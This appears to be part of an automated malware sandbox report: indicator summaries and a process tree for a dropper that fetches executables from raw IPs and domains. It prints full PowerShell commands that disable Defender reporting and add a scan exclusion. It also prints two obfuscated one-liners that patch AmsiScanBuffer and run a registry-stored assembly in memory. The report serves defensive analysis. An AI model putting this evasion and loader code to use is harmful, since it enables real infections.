Token: SeDebugPrivilege 3644 powershell.EXE Token: SeDebugPrivilege 396 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2152 svchost.exe Token: SeIncreaseQuotaPrivilege 2152 svchost.exe Token: SeSecurityPrivilege 2152 svchost.exe Token: SeTakeOwnershipPrivilege 2152 svchost.exe Token: SeLoadDriverPrivilege 2152 svchost.exe Token: SeSystemtimePrivilege 2152 svchost.exe Token: SeBackupPrivilege 2152 svchost.exe Token: SeRestorePrivilege 2152 svchost.exe Token: SeShutdownPrivilege 2152 svchost.exe Token: SeSystemEnvironmentPrivilege 2152 svchost.exe Token: SeUndockPrivilege 2152 svchost.exe Token: SeManageVolumePrivilege 2152 svchost.exe -
Suspicious use of FindShellTrayWindow 12 IoCs
Processes:
httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exehttpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exeInformationCheck.exeInformationCheck.exepid Process 1976 httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe 1976 httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe 1976 httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe 1072 httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe 1072 httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe 1072 httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe 1764 InformationCheck.exe 1764 InformationCheck.exe 1764 InformationCheck.exe 2924 InformationCheck.exe 2924 InformationCheck.exe 2924 InformationCheck.exe -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exehttpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exeInformationCheck.exeInformationCheck.exepid Process 1976 httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe 1976 httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe 1976 httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe 1072 httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe 1072 httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe 1072 httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe 1764 InformationCheck.exe 1764 InformationCheck.exe 1764 InformationCheck.exe 2924 InformationCheck.exe 2924 InformationCheck.exe 2924 InformationCheck.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exepid Process 3012 http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exehttpproxy.siteterbaru.xyzcss0a839761915d.exe.exehttp185.215.113.66newtpp.exe.exehttpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exeUUSIService.exehttp185.215.113.66pei.exe.exesysppvrdnvs.execmd.execmd.exedescription pid Process procid_target PID 4528 wrote to memory of 5044 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 89 PID 4528 wrote to memory of 5044 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 89 PID 4528 wrote to memory of 5044 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 89 PID 4528 wrote to memory of 2940 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 88 PID 4528 wrote to memory of 2940 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 88 PID 4528 wrote to memory of 2940 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 88 PID 4528 wrote to memory of 4396 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 90 PID 4528 wrote to memory of 4396 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 90 PID 4528 wrote to memory of 4396 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 90 PID 4528 wrote to memory of 4444 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 91 PID 4528 wrote to memory of 4444 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 91 PID 4528 wrote to memory of 4444 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 91 PID 4528 wrote to memory of 3500 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 92 PID 4528 wrote to memory of 3500 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 92 PID 4528 wrote to memory of 3500 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 92 PID 4528 wrote to memory of 880 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 93 PID 4528 wrote to memory of 880 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 93 PID 4528 wrote to memory of 880 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 93 PID 4528 wrote to memory of 3316 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 94 PID 4528 wrote to memory of 3316 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 94 PID 4528 wrote to memory of 3316 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 94 PID 3316 wrote to memory of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 3316 wrote to memory of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 3316 wrote to memory of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 3316 wrote to memory of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 3316 wrote to memory of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 3316 wrote to memory of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 3316 wrote to memory of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 3316 wrote to memory of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 3316 wrote to memory of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 5044 wrote to memory of 1552 5044 http185.215.113.66newtpp.exe.exe 99 PID 5044 wrote to memory of 1552 5044 http185.215.113.66newtpp.exe.exe 99 PID 5044 wrote to memory of 1552 5044 http185.215.113.66newtpp.exe.exe 99 PID 4396 wrote to memory of 544 4396 httpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exe 101 PID 4396 wrote to memory of 544 4396 httpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exe 101 PID 4396 wrote to memory of 544 4396 httpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exe 101 PID 544 wrote to memory of 2556 544 UUSIService.exe 102 PID 544 wrote to memory of 2556 544 UUSIService.exe 102 PID 544 wrote to memory of 2556 544 UUSIService.exe 102 PID 2940 wrote to memory of 3436 2940 http185.215.113.66pei.exe.exe 103 PID 2940 wrote to memory of 3436 2940 http185.215.113.66pei.exe.exe 103 PID 2940 wrote to memory of 3436 2940 http185.215.113.66pei.exe.exe 103 PID 1552 wrote to memory of 1884 1552 sysppvrdnvs.exe 104 PID 1552 wrote to memory of 1884 1552 sysppvrdnvs.exe 104 PID 1552 wrote to memory of 1884 1552 sysppvrdnvs.exe 104 PID 1552 wrote to memory of 392 1552 sysppvrdnvs.exe 106 PID 1552 wrote to memory of 392 1552 sysppvrdnvs.exe 106 PID 1552 wrote to memory of 392 1552 sysppvrdnvs.exe 106 PID 1884 wrote to memory of 968 1884 cmd.exe 108 PID 1884 wrote to memory of 968 1884 cmd.exe 108 PID 1884 wrote to memory of 968 1884 cmd.exe 108 PID 392 wrote to memory of 1424 392 cmd.exe 109 PID 392 wrote to memory of 1424 392 cmd.exe 109 PID 392 wrote to memory of 1424 392 cmd.exe 109 PID 392 wrote to memory of 4384 392 cmd.exe 110 PID 392 wrote to memory of 4384 392 cmd.exe 110 PID 392 wrote to memory of 4384 392 cmd.exe 110 PID 392 wrote to memory of 4368 392 cmd.exe 111 PID 392 wrote to memory of 4368 392 cmd.exe 111 PID 392 wrote to memory of 4368 392 cmd.exe 111 PID 392 wrote to memory of 1568 392 cmd.exe 112 PID 392 wrote to memory of 1568 392 cmd.exe 112 PID 392 wrote to memory of 1568 392 cmd.exe 112 PID 392 wrote to memory of 1116 392 cmd.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe -
outlook_win_path 1 IoCs
Processes:
http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:332
-
-
C:\Users\Admin\AppData\Local\Temp\http146.70.24.213do1654365431.exe.exeC:\Users\Admin\AppData\Local\Temp\http146.70.24.213do1654365431.exe.exe2⤵
- Executes dropped EXE
PID:3328 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "C:\Users\Admin\AppData\Local\Temp\gsroyn0gt7s09qnn.bat"3⤵PID:2028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\d473b7p95cz11a49ejc7kqwx.exe"C:\Users\Admin\AppData\Local\Temp\d473b7p95cz11a49ejc7kqwx.exe"3⤵
- Executes dropped EXE
PID:4768
-
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a9ceb052-c469-4945-a1e5-c92fa9512c2c}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1212
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qudQNUQXhHQw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HRxFodYmuTjHCO,[Parameter(Position=1)][Type]$KprBWudoCS)$CZAHEBlkcre=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+'o'+''+'d'+''+[Char](117)+'le',$False).DefineType('M'+'y'+''+[Char](68)+''+'e'+''+'l'+''+'e'+''+[Char](103)+'a'+'t'+'e'+'T'+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+'l'+''+[Char](97)+'ss'+[Char](44)+'P'+[Char](117)+'bli'+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+[Char](97)+''+'l'+''+'e'+'d'+','+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+''+'A'+'uto'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$CZAHEBlkcre.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+'e,'+[Char](72)+'i'+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$HRxFodYmuTjHCO).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'ag'+[Char](101)+'d');$CZAHEBlkcre.DefineMethod(''+'I'+''+[Char](110)+''+'v'+'o'+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+'Si'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$KprBWudoCS,$HRxFodYmuTjHCO).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $CZAHEBlkcre.CreateType();}$iADFBxrUqCstL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'em'+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+'.'+'U'+'n'+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+'e'+[Char](77)+''+'e'+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$alqishhDqFQEGm=$iADFBxrUqCstL.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+'A'+''+'d'+''+'d'+''+[Char](114)+''+'e'+'ss',[Reflection.BindingFlags]('Pub'+[Char](108)+''+[Char](105)+''+'c'+','+'S'+''+[Char](116)+'a'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fPxRppgCgvazeHtbyvs=qudQNUQXhHQw @([String])([IntPtr]);$sufriYclxghmTouIbVWTZh=qudQNUQXhHQw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eNlbHgtQVGv=$iADFBxrUqCstL.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+''+'H'+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+'l')));$TpeDFjMWZFDYKB=$alqishhDqFQEGm.Invoke($Null,@([Object]$eNlbHgtQVGv,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$KFbafCSpQXJKDvfKu=$alqishhDqFQEGm.Invoke($Null,@([Object]$eNlbHgtQVGv,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+'r'+'o'+'t'+'e'+'c'+'t')));$eWXHLwu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TpeDFjMWZFDYKB,$fPxRppgCgvazeHtbyvs).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$ZbLwIbgqPQbbDazOL=$alqishhDqFQEGm.Invoke($Null,@([Object]$eWXHLwu,[Object](''+'A'+''+'m'+'s'+[Char](105)+''+'S'+'c'+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$nqlbFxqeja=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KFbafCSpQXJKDvfKu,$sufriYclxghmTouIbVWTZh).Invoke($ZbLwIbgqPQbbDazOL,[uint32]8,4,[ref]$nqlbFxqeja);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZbLwIbgqPQbbDazOL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KFbafCSpQXJKDvfKu,$sufriYclxghmTouIbVWTZh).Invoke($ZbLwIbgqPQbbDazOL,[uint32]8,0x20,[ref]$nqlbFxqeja);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+'l'+''+'e'+'r'+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3644 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:448
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FkgaodVaMZzt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ksSgfXLQTMLPKG,[Parameter(Position=1)][Type]$vlogRRsDtG)$oFCKKUHqNfj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e','Cl'+[Char](97)+'s'+'s'+''+[Char](44)+''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'A'+[Char](117)+''+[Char](116)+'oCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$oFCKKUHqNfj.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+'m'+'e'+','+[Char](72)+''+'i'+''+'d'+''+'e'+'B'+[Char](121)+'Si'+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ksSgfXLQTMLPKG).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+'ed');$oFCKKUHqNfj.DefineMethod(''+[Char](73)+''+[Char](110)+'vok'+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'N'+''+'e'+''+'w'+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+'V'+''+'i'+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+'',$vlogRRsDtG,$ksSgfXLQTMLPKG).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+'d');Write-Output $oFCKKUHqNfj.CreateType();}$GujJBimyZNwjX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+'t.'+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'eNa'+[Char](116)+''+'i'+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'t'+'h'+''+[Char](111)+''+[Char](100)+'s');$oBWmfnbZIYysJD=$GujJBimyZNwjX.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic,'+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DWNCjfchxKppnFjoVMY=FkgaodVaMZzt @([String])([IntPtr]);$pirBorecjzyBVMEuqZksjY=FkgaodVaMZzt @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zLdRhXtBmPa=$GujJBimyZNwjX.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+'a'+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'ll')));$xsheiCCyrtuLBU=$oBWmfnbZIYysJD.Invoke($Null,@([Object]$zLdRhXtBmPa,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$zWYSZUbNsZrUNSmvI=$oBWmfnbZIYysJD.Invoke($Null,@([Object]$zLdRhXtBmPa,[Object](''+'V'+'i'+[Char](114)+'t'+[Char](117)+''+'a'+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$mcRSbZk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xsheiCCyrtuLBU,$DWNCjfchxKppnFjoVMY).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+'l');$iwKuMPKmRvjwVVkmW=$oBWmfnbZIYysJD.Invoke($Null,@([Object]$mcRSbZk,[Object](''+'A'+'ms'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$TQsDpemWla=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zWYSZUbNsZrUNSmvI,$pirBorecjzyBVMEuqZksjY).Invoke($iwKuMPKmRvjwVVkmW,[uint32]8,4,[ref]$TQsDpemWla);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iwKuMPKmRvjwVVkmW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zWYSZUbNsZrUNSmvI,$pirBorecjzyBVMEuqZksjY).Invoke($iwKuMPKmRvjwVVkmW,[uint32]8,0x20,[ref]$TQsDpemWla);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+'RE').GetValue('d'+[Char](105)+''+[Char](97)+'le'+[Char](114)+'st'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3516 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1968
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1616
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2664
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1956
-
